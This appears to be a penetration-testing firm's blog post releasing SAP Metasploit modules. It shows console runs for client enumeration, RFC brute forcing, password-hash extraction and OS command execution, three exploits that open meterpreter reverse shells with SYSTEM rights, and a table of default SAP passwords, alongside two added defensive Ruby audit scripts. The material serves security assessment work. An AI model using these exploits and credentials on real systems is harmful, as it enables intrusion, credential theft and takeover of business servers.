MWR SAP Metasploit Modules

We have recently developed several Metasploit auxiliary and exploitation modules to assist consultants in assessing SAP systems, and Dave has also delivered a presentation “SAP Slapping (a pentesters guide)” at CRESTCon and BSides London where some of these modules were demonstrated. We plan to submit these modules to the Metasploit Framework; however, until this process is complete, the modules will be available here. We have not yet finished all of the modules that we plan to write, so stay tuned for future updates.

Some of the modules here are based on, or are ports of the plugins available in the Onapsis Bizploit Opensource ERP Penetration Testing framework. Others are not. Bizploit has been an essential tool for security consultants assessing SAP systems since its release. However the framework has not been updated since then. Bizploit was our inspiration for writing the Metasploit modules.

The intention behind writing the Metasploit modules, as opposed to contributing back to the Bizploit framework, was to encourage contributions from the community. Bizploit is written in Python and C and has not seen any community contributions; this is unfortunate. We’re hoping that the community finds it easier to contribute to the Metasploit framework and helps to build an even more impressive free and open source SAP assessment tool set leveraging the capabilities of the Metasploit framework.

Mariano Nuñez (the author of the Bizploit framework) helped in our efforts in producing the Metasploit modules and was happy to share his knowledge and experience – a very cool guy. We’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP.

The majority of the modules rely on the SAP NW RFC SDK and require the Ruby wrapper ‘nwrfc’ by Martin Ceronio.

Unfortunately the NW RFC SDK is available only to those who have access to the SAP Service Marketplace (SMP). In order to get access to the SAP Marketplace you need an S-ID, password and customer number. Alternatively the required library files (such as libsapnwrfc) can be extracted from a SAP system (such as the freely available test drive systems). These third party requirements are one of the reasons that the submission to the Metasploit Framework is proving problematic.

At present the modules mostly relate to exploiting issues with Remote Function Calls (RFC). RFC is the standard SAP interface for communication between SAP systems. SAP systems can communicate with other SAP systems, or with non-SAP systems, using RFC and/or by calling functions directly in a system (using an Advanced Business Application Programming (ABAP) interface or the RFC API). RFCs are basically independent ABAP modules that can be called locally or remotely.

RFC communication is done through the Gateway Service (each instance of a SAP system has a gateway). The gateway enables communication between work processes and external programs, as well as communication between work processes from different instances or SAP Systems. There are more than 33,000 RFC-enabled function modules available in a standard SAP ECC 6.0 system.

We have completed seven auxiliary modules and three exploit modules (more will follow soon). Details of these are presented below.

sap_rfc_client_enum auxiliary module

In SAP land, clients are things you connect to using a GUI. The range is 000 – 999, with the default clients being 000, 001 and 066. If you try to connect via RFC to a client that does not exist, SAP returns the error “Client is not available”. It is therefore possible to brute force the whole range to discover the available ones.

The sap_rfc_client_enum module attempts to brute force the available SAP clients via the RFC interface.

./msfcli auxiliary/scanner/sap/sap_rfc_client_enum RHOSTS=172.16.252.135 RPORT=3342 E

[*] Brute forcing clients 000,001,066
[+] 172.16.252.135:3342 [SAP] client found - 000
[+] 172.16.252.135:3342 [SAP] client found - 001
[+] 172.16.252.135:3342 [SAP] client found - 066
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_brute_login auxiliary module

Typically the default account lockout threshold applied to SAP accounts is 5. However, accounts in most systems unlock at 00:01, so if you're going to attempt a brute force attack, do it before 00:00 and after the user has finished for the day.

If you can communicate with the SAP Management Console via its SOAP interface you can extract the exact configuration (unauthenticated) by making use of the Metasploit module ‘sap_mgmt_con_getprocessparameter’ written by Chris John Riley. For more details on how this is possible see here.

msf > use auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
msf  auxiliary(sap_mgmt_con_getprocessparameter) > set RHOST 172.16.252.135
RHOST => 172.16.252.135
msf  auxiliary(sap_mgmt_con_getprocessparameter) > set MATCH login/fail
MATCH => login/fail
msf  auxiliary(sap_mgmt_con_getprocessparameter) > run

[*] [SAP] Connecting to SAP Management Console SOAP Interface on 172.16.252.135:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 172.16.252.135:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] [SAP] Process Parameter Results for (?i-mx:login\/fail)
 
[SAP] Process Parameters
========================

   Name                           Description                                          Value
   ----                           -----------                                          -----
   login/failed_user_auto_unlock  Enable automatic unlock off locked user at midnight  0
   login/fails_to_session_end     Number of invalid login attempts until session end   3
   login/fails_to_user_lock       Number of invalid login attempts until user lock     5


[*] Scanned 1 of 2 hosts (050% complete)
[*] [SAP] Connecting to SAP Management Console SOAP Interface on 10.0.0.192:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 10.0.0.192:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
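The lockout parameters above are what an administrator should be reading as well. The following Ruby is an added example, not part of the MWR modules or of Chris John Riley's sap_mgmt_con_getprocessparameter module: it parses the process-parameter table as the console prints it and reports the two settings that matter for password guessing. The baseline threshold of 5 is taken from the paragraph above; the WEAK_PARAMETERS block is a constructed configuration for comparison, not output from a real system.

```ruby
# Added example (not MWR's module code): audit the login/* lockout parameters
# reported by sap_mgmt_con_getprocessparameter. The threshold used as the
# baseline is an assumption for illustration.

# Constructed sample: the parameter rows as printed in the console output above.
SAMPLE_PARAMETERS = <<~OUT
   Name                           Description                                          Value
   ----                           -----------                                          -----
   login/failed_user_auto_unlock  Enable automatic unlock off locked user at midnight  0
   login/fails_to_session_end     Number of invalid login attempts until session end   3
   login/fails_to_user_lock       Number of invalid login attempts until user lock     5
OUT

# Constructed weak configuration for comparison (not taken from a real system).
WEAK_PARAMETERS = <<~OUT
   login/failed_user_auto_unlock  Enable automatic unlock off locked user at midnight  1
   login/fails_to_session_end     Number of invalid login attempts until session end   3
   login/fails_to_user_lock       Number of invalid login attempts until user lock     99
OUT

# Turn "name  description  value" rows into { 'login/...' => 'value' }.
# SAP parameter names contain a '/', which keeps the header and separator rows out.
def parse_process_parameters(text)
  params = {}
  text.each_line do |line|
    next unless line =~ %r{^\s*(\S+/\S+)\s+.*?\s+(\S+)\s*$}
    params[Regexp.last_match(1)] = Regexp.last_match(2)
  end
  params
end

# Return a list of findings. max_fails is the assumed baseline; the page notes
# that the usual default threshold is 5 failed attempts.
def audit_lockout(params, max_fails: 5)
  findings = []

  case params['login/failed_user_auto_unlock']
  when nil
    findings << 'login/failed_user_auto_unlock not reported: cannot confirm locked users stay locked'
  when '0'
    # Locked users stay locked until an administrator releases them.
  else
    findings << 'login/failed_user_auto_unlock enabled: locked users are released at midnight, ' \
                'so a guessing campaign only has to pause until the next day'
  end

  lock = params['login/fails_to_user_lock']
  if lock.nil?
    findings << 'login/fails_to_user_lock not reported'
  elsif lock.to_i > max_fails
    findings << "login/fails_to_user_lock=#{lock}: more than #{max_fails} failed attempts before the user is locked"
  end

  findings
end

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_PARAMETERS, WEAK_PARAMETERS].each do |text|
    findings = audit_lockout(parse_process_parameters(text))
    puts(findings.empty? ? 'no findings' : findings)
  end
end
```

The system shown above produces no findings (auto-unlock off, lock after 5); the constructed weak profile produces two. Because the management console answers this query unauthenticated, the same two parameters are worth checking from the network perspective an attacker has, not only from within SAP.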

A list of default SAP system username and password combinations is contained within the table below.

User        Description                       Clients                       Password
----        -----------                       -------                       --------
SAP*        Super user                        000, 001, 066 & new clients   06071992 & PASS
DDIC        ABAP Dictionary super user        000, 001                      19920706
TMSADM      Transport Management System user  000                           PASSWORD
EARLYWATCH  EarlyWatch service user           066                           SUPPORT
SAPCPIC     Communications user               000, 001                      ADMIN

The sap_rfc_brute_login module attempts to brute force the username and password combination via an exposed RFC interface.

./msfcli auxiliary/scanner/sap/sap_rfc_brute_login BLANK_PASSWORDS=false USER_AS_PASS=false RHOSTS=172.16.252.135 RPORT=3342 E

[*] Brute forcing clients 000,001,066

[SAP] Credentials
=================

   host            port  client  user        pass      status
   ----            ----  ------  ----        ----      ------
   172.16.252.135  3342  000     SAP*        06071992  locked
   172.16.252.135  3342  000     DDIC        19920706  
   172.16.252.135  3342  001     SAP*        06071992  
   172.16.252.135  3342  001     DDIC        19920706  
   172.16.252.135  3342  066     SAP*        06071992  locked
   172.16.252.135  3342  066     EARLYWATCH  SUPPORT   

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_sxpg_call_system exploit module

The RFC SXPG_CALL_SYSTEM can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.

The sap_rfc_sxpg_call_system module exploits an arbitrary command execution vulnerability in the SXPG_CALL_SYSTEM RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.

msf > use exploit/windows/sap/sap_rfc_sxpg_call_system 
msf  exploit(sap_rfc_sxpg_call_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf  exploit(sap_rfc_sxpg_call_system) > set RPORT 3300
RPORT => 3300
msf  exploit(sap_rfc_sxpg_call_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf  exploit(sap_rfc_sxpg_call_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf  exploit(sap_rfc_sxpg_call_system) > exploit

[*] Started reverse handler on 10.0.1.161:4444 
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_CALL_SYSTEM RFC. We're limited to approx. 256 chars,
    be patient!
[*] Command Stager progress -   2.19% done (249/11366 bytes)
[*] Command Stager progress -   4.38% done (498/11366 bytes)
[*] Command Stager progress -   6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress -  95.94% done (10904/11366 bytes)
[*] Command Stager progress -  98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 10 opened (10.0.1.161:4444 -> 10.0.1.150:55364) at Wed Mar 21 10:28:32 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7600).
Computer        : GATEWAY
Architecture    : x64
Meterpreter     : x64/win64

sap_rfc_sxpg_command_exec exploit module

The RFC SXPG_COMMAND_EXEC can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.

The sap_rfc_sxpg_command_exec module exploits an arbitrary command execution vulnerability in the SXPG_COMMAND_EXEC RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.

msf > use exploit/windows/sap/sap_rfc_sxpg_command_exec
msf  exploit(sap_rfc_sxpg_command_exec) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf  exploit(sap_rfc_sxpg_command_exec) > set RPORT 3300
RPORT => 3300
msf  exploit(sap_rfc_sxpg_command_exec) > set CLIENT 001
CLIENT => 001
msf  exploit(sap_rfc_sxpg_command_exec) > set USER SAP*
USER => SAP*
msf  exploit(sap_rfc_sxpg_command_exec) > set PASS 06071992
PASS => 06071992
msf  exploit(sap_rfc_sxpg_command_exec) > set CMD LIST_DB2DUMP
CMD => LIST_DB2DUMP
msf  exploit(sap_rfc_sxpg_command_exec) > set OS 3
OS => 3
msf  exploit(sap_rfc_sxpg_command_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf  exploit(sap_rfc_sxpg_command_exec) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf  exploit(sap_rfc_sxpg_command_exec) > set LPORT 4444
LPORT => 4444
msf  exploit(sap_rfc_sxpg_command_exec) > exploit

[*] Started reverse handler on 10.0.1.161:4444 
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_COMMAND_EXECUTE RFC. We're limited to approx. 256 chars,
    be patient!
[*] Command Stager progress -   2.19% done (249/11366 bytes)
[*] Command Stager progress -   4.38% done (498/11366 bytes)
[*] Command Stager progress -   6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress -  95.94% done (10904/11366 bytes)
[*] Command Stager progress -  98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 2 opened (10.0.1.161:4444 -> 10.0.1.150:58640) at Wed Mar 21 13:40:41 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7600).
Computer        : GATEWAY
Architecture    : x64
Meterpreter     : x64/win64 

sap_rfc_system exploit module

The RFC_ABAP_INSTALL_AND_RUN RFC takes ABAP source lines and executes them. It is common for it to be disabled and/or access revoked in PROD environments; it is also deprecated. That doesn’t mean you won’t find it enabled or that control of DEV or QAS environments doesn’t offer the opportunity to gain access to the PROD environment!

The sap_rfc_system module exploits an arbitrary command execution vulnerability in the RFC_ABAP_INSTALL_AND_RUN RFC to deliver a custom Metasploit payload.

msf > use exploit/windows/sap/sap_rfc_system
msf  exploit(sap_rfc_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf  exploit(sap_rfc_system) > set RPORT 3300
RPORT => 3300
msf  exploit(sap_rfc_system) > set CLIENT 001
CLIENT => 001
msf  exploit(sap_rfc_system) > set USER SAP*
USER => SAP*
msf  exploit(sap_rfc_system) > set PASS 06071992
PASS => 06071992
msf  exploit(sap_rfc_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf  exploit(sap_rfc_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf  exploit(sap_rfc_system) > set LPORT 3344
LPORT => 3344
msf  exploit(sap_rfc_system) > exploit

[*] Started reverse handler on 10.0.1.161:3344 
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload via RFC_ABAP_INSTALL_AND_RUN RFC. We're limited to approx. 256 chars, be patient!
[*] Command Stager progress -   2.19% done (249/11366 bytes)
[*] Command Stager progress -   4.38% done (498/11366 bytes)
[*] Command Stager progress -   6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress -  95.94% done (10904/11366 bytes)
[*] Command Stager progress -  98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 1 opened (10.0.1.161:3344 -> 10.0.1.150:64998) at Thu Mar 22 11:31:20 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7600).
Computer        : GATEWAY
Architecture    : x64
Meterpreter     : x64/win64

sap_rfc_usr02 auxiliary module

SAP has implemented a number of different password hashing mechanisms. Hashes are stored in tables USR02 and USH02 (BCODE & PASSCODE fields). This module makes use of the RFC_ABAP_INSTALL_AND_RUN RFC to extract SAP user hashes from the USR02 table. The ABAP code in the module executes native SQL to extract the hashes of all users across all clients. These can be cracked by john-the-ripper. The ABAP source is below.

REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
DATA: MANDT(3), BNAME(12), BCODE TYPE XUCODE, PASSC TYPE PWD_SHA1.
EXEC SQL PERFORMING loop_output.
  SELECT MANDT, BNAME, BCODE, PASSCODE INTO :MANDT, :BNAME, :BCODE, :PASSC
  FROM USR02
ENDEXEC.
FORM loop_output.
  WRITE: / MANDT, BNAME, BCODE, PASSC.
ENDFORM.

An example run is shown below.

./msfcli auxiliary/scanner/sap/sap_rfc_usr02 RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Users and hashes
======================

   MANDT  Username    BCODE             PASSCODE
   -----  --------    -----             --------
   000    DDIC        61D26428640DBAB5  905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
   000    SAP*        D0BFF4276DA1E208  8948310AF768FA9061598E8F68FD144CE65B7480
   000    SAPCPIC     7D806C248F03813D  0000000000000000000000000000000000000000
   000    TMSADM      942B9DC0F2394D85  C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF
   001    DDIC        61D26428640DBAB5  905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
   001    ADS_AGENT   8C32369322B732F6  FE0DD787EE7EBCBF4728BDC1A865A6F15B064611
   001    ADSUSER     7FE24F5321515E7F  CD83AD9E92B4E37E2255FEA11AC82234BA825FBD
   001    SAPJSF      7D6762BFB7504CA4  93738A70AA83C6DAA6CD0B3B1853986333A29192
   001    J2EE_ADMIN  6C1541BC997289D1  149E781A80383CC59AB04E88B51832819403364F
   001    J2EE_GUEST  0000000000000000  0000000000000000000000000000000000000000
   001    SAP*        D0BFF4276DA1E208  8948310AF768FA9061598E8F68FD144CE65B7480
   001    SAPCPIC     7D806C248F03813D  0000000000000000000000000000000000000000
   001    DEVELOPER   C4C768AEB4A99EF5  4BD353A8F1D8B453D58910CC87D24B0C1C9A9011
   066    EARLYWATCH  BD5E494D3ECBF5E2  0000000000000000000000000000000000000000
   066    SAP*        29B60B2614510C1D  789C6E939E7BD99A554D79ABC214910A502EE407

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
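The table above is also the input an administrator needs for cleanup: which default accounts exist in which client, which users still carry only the legacy BCODE hash, and which users have the same password in several clients. The following Ruby is an added example, not part of the sap_rfc_usr02 module; it parses the rows as the module prints them. The interpretation of an all-zero field (no hash of that type stored) is an assumption stated in the comments; the module does not extract USR02-CODVN, the column that records the hash version, so the all-zero check stands in for it.

```ruby
# Added example (not MWR's module code): triage the USR02 rows printed by
# sap_rfc_usr02. Reading of all-zero hash fields is an assumption noted inline.

# Constructed sample: the rows from the module output above.
USR02_OUTPUT = <<~OUT
   MANDT  Username    BCODE             PASSCODE
   -----  --------    -----             --------
   000    DDIC        61D26428640DBAB5  905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
   000    SAP*        D0BFF4276DA1E208  8948310AF768FA9061598E8F68FD144CE65B7480
   000    SAPCPIC     7D806C248F03813D  0000000000000000000000000000000000000000
   000    TMSADM      942B9DC0F2394D85  C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF
   001    DDIC        61D26428640DBAB5  905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
   001    ADS_AGENT   8C32369322B732F6  FE0DD787EE7EBCBF4728BDC1A865A6F15B064611
   001    ADSUSER     7FE24F5321515E7F  CD83AD9E92B4E37E2255FEA11AC82234BA825FBD
   001    SAPJSF      7D6762BFB7504CA4  93738A70AA83C6DAA6CD0B3B1853986333A29192
   001    J2EE_ADMIN  6C1541BC997289D1  149E781A80383CC59AB04E88B51832819403364F
   001    J2EE_GUEST  0000000000000000  0000000000000000000000000000000000000000
   001    SAP*        D0BFF4276DA1E208  8948310AF768FA9061598E8F68FD144CE65B7480
   001    SAPCPIC     7D806C248F03813D  0000000000000000000000000000000000000000
   001    DEVELOPER   C4C768AEB4A99EF5  4BD353A8F1D8B453D58910CC87D24B0C1C9A9011
   066    EARLYWATCH  BD5E494D3ECBF5E2  0000000000000000000000000000000000000000
   066    SAP*        29B60B2614510C1D  789C6E939E7BD99A554D79ABC214910A502EE407
OUT

# Default accounts from the table earlier on this page.
DEFAULT_ACCOUNTS = %w[SAP* DDIC TMSADM EARLYWATCH SAPCPIC].freeze

Row = Struct.new(:client, :user, :bcode, :passcode)

# One Row per data line; header and separator lines do not match the pattern.
def parse_usr02(text)
  text.each_line.map do |line|
    m = line.match(/^\s*(\d{3})\s+(\S+)\s+([0-9A-F]{16})\s+([0-9A-F]{40})\s*$/)
    Row.new(*m.captures) if m
  end.compact
end

def all_zero?(hex)
  hex.match?(/\A0+\z/)
end

def triage_usr02(rows)
  report = { default_accounts: [], bcode_only: [], no_hash: [], reused_across_clients: [] }

  rows.each do |r|
    report[:default_accounts] << "#{r.client}/#{r.user}" if DEFAULT_ACCOUNTS.include?(r.user)
    if all_zero?(r.bcode) && all_zero?(r.passcode)
      # Assumption: neither field populated means no password hash is stored for this user.
      report[:no_hash] << "#{r.client}/#{r.user}"
    elsif all_zero?(r.passcode)
      # Assumption: only the legacy BCODE hash is stored; no SHA1 PASSCODE has been set.
      report[:bcode_only] << "#{r.client}/#{r.user}"
    end
  end

  # BCODE/PASSCODE are derived from user name and password with no random salt,
  # so the same user with an identical BCODE in two clients has the same password in both.
  rows.group_by(&:user).each do |user, list|
    next if list.size < 2
    list.group_by(&:bcode).each_value do |same|
      next if same.size < 2 || all_zero?(same.first.bcode)
      report[:reused_across_clients] << "#{user}: #{same.map(&:client).join(',')}"
    end
  end

  report
end

if __FILE__ == $PROGRAM_NAME
  triage_usr02(parse_usr02(USR02_OUTPUT)).each { |k, v| puts "#{k}: #{v.join(' | ')}" }
end
```

On the sample this reports nine default-account rows, three users with a BCODE-only hash, one user with no hash at all (J2EE_GUEST), and DDIC, SAP* and SAPCPIC sharing a password between clients 000 and 001.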

sap_rfc_read_table auxiliary module

This module makes use of the RFC_READ_TABLE function to extract arbitrary data from SAP tables.
WARNING: RFC_READ_TABLE truncates RAW data and so is not capable of reading the BCODE/PASSCODE fields from the USR02/USH02 tables, as only the first half of each hash is returned. RFC_READ_TABLE miscalculates the length of raw fields: e.g. an 8-byte field is treated as 8 characters when it should be 16 hex characters. There is nothing you can do about it.

The text below is taken from SAP Note 382318.

The scope of function module RFC_READ_TABLE is very restricted. E.g., due to the fixed maximum row size only smaller tables can be accessed. There are several data types that cannot be handled, and also there are doubts regarding the Unicode compatibility of the function module. However, all this is quite immaterial, because the function is not meant to be publicly used anyway. It was only created to be used as a sample in various training courses, and is clearly flagged as “not released for customer”.

Solution – Do not use function module RFC_READ_TABLE in the first place!

./msfcli auxiliary/scanner/sap/sap_rfc_read_table RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
  TABLE=USR02 FIELDS="MANDT,BNAME" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 001|ADSUSER
[+] 001|ADS_AGENT
[+] 001|DDIC
[+] 001|DEVELOPER
[+] 001|J2EE_ADMIN
[+] 001|J2EE_GUEST
[+] 001|SAP*
[+] 001|SAPCPIC
[+] 001|SAPJSF
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_system auxiliary module

This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary OS commands via the ABAP SYSTEM call. The ABAP source is below.

REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
TYPES lt_line(255) TYPE c.
DATA lv_cmd(42) TYPE c.
DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE.
lv_cmd = '#{command}'.
CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd
ID 'TAB' FIELD lt_result-*sys*.
LOOP AT lt_result.
WRITE : / lt_result.
ENDLOOP.

An example run is shown below.

./msfcli auxiliary/scanner/sap/sap_rfc_system RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.135:3342 [SAP] Executed id

[SAP] Command Exec
==================

   Output
   ------
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_sxpg_command_exec auxiliary module

This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. Transaction SM69 is used to maintain external OS commands.

1.1. File System

A number of OS commands are preconfigured on SAP installs within transaction SM69. Below the module is executing the LIST_DB2DUMP (ls -la) command on a UNIX system to view the attributes of the /etc/passwd file.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
  CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP /etc/passwd

[SAP] Command Exec
==================

   Output
   ------
   -rw-r--r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

A number of OS commands are preconfigured on SAP installs within SM69. Below the module is executing the CAT command on a UNIX system to view the contents of the /etc/passwd file.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
  CMD=CAT OS=2 PARAM="/etc/passwd" E 

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: CAT /etc/passwd

[SAP] Command Exec
==================

   Output
   ------
   at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
   bin:x:1:1:bin:/bin:/bin/bash
   daemon:x:2:2:Daemon:/sbin:/bin/bash
   dnsmasq:x:103:65534:dnsmasq:/var/lib/empty:/bin/false
   ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
   games:x:12:100:Games account:/var/games:/bin/bash
   gdm:x:109:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
   haldaemon:x:105:107:User for haldaemon:/var/run/hald:/bin/false
   lighttpd:x:101:102:user for lighttpd:/var/lib/lighttpd:/bin/false
   lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
   mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
   man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
   messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
   news:x:9:13:News system:/etc/news:/bin/bash
   nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
   npladm:x:1001:100:npladm:/home/npladm:/bin/csh
   ntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/false
   polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false
   postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
   pulse:x:106:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
   root:x:0:0:root:/root:/bin/bash
   sapadm:x:1004:100:sapadm:/home/sapadm:/bin/csh
   sdb:x:1002:100:sdb:/home/sdb:/bin/csh
   sqdnpl:x:1003:100:sqdnpl:/home/sqdnpl:/bin/csh
   sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
   suse-ncc:x:108:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
   testdrive:x:1000:100::/home/testdrive:/bin/bash
   uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
   uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
   wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
   yastws:x:107:110:User for YaST-Webservice:/var/lib/yastws:/bin/false

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

1.2. Database Pwnage

MaxDB has a similar mechanism to Oracle's REMOTE_OS_AUTHENT, called XUSER. If the OS user has a file named .XUSER.62 in their home directory, they can connect to the database by specifying the defined user key alone (no need to enter a username and/or password!).

Below the module is being used to execute the XUSER command to view the contents of the .XUSER.62 file.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
  CMD=XUSER OS=1 PARAM="list" E 

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: XUSER list

[SAP] Command Exec
==================

   Output
   ------
   --------------
   --------------
   --------------
   --------------
   -----------------------------------------------------------------
   -----------------------------------------------------------------
   -----------------------------------------------------------------
   -----------------------------------------------------------------
   Cachelimit    :-1
   Cachelimit    :-1
   Cachelimit    :-1
   Cachelimit    :-1
   Charset       :<unspecified>
   Charset       :<unspecified>
   Charset       :<unspecified>
   Charset       :<unspecified>
   Dbname        :NPL
   Dbname        :NPL
   Dbname        :NPL
   Dbname        :NPL
   Isolation     :-1
   Isolation     :-1
   Isolation     :-1
   Isolation     :0
   Key           :DEFAULT
   Key           :c
   Key           :c_J2EE
   Key           :w
   Long Password :?????????
   Long Password :?????????
   Long Password :?????????
   Long Password :?????????
   Nodename      :nplhost
   Nodename      :nplhost
   Nodename      :nplhost
   Nodename      :nplhost
   Password      :?????????
   Password      :?????????
   Password      :?????????
   Password      :?????????
   PasswordUCS2  :?????????
   PasswordUCS2  :?????????
   PasswordUCS2  :?????????
   PasswordUCS2  :?????????
   Sqlmode       :INTERNAL
   Sqlmode       :INTERNAL
   Sqlmode       :INTERNAL
   Sqlmode       :SAPR3
   Timeout       :-1
   Timeout       :-1
   Timeout       :-1
   Timeout       :0
   Username      :CONTROL
   Username      :CONTROL
   Username      :SAPNPL
   Username      :SUPERDBA
   UsernameUCS2  :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
   UsernameUCS2  :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
   UsernameUCS2  :S.A.P.N.P.L. . . . . . . . . . . . . . . . . . . . . . . . . . .
   UsernameUCS2  :S.U.P.E.R.D.B.A. . . . . . . . . . . . . . . . . . . . . . . . .
   XUSER Entry  1
   XUSER Entry  2
   XUSER Entry  3
   XUSER Entry  4

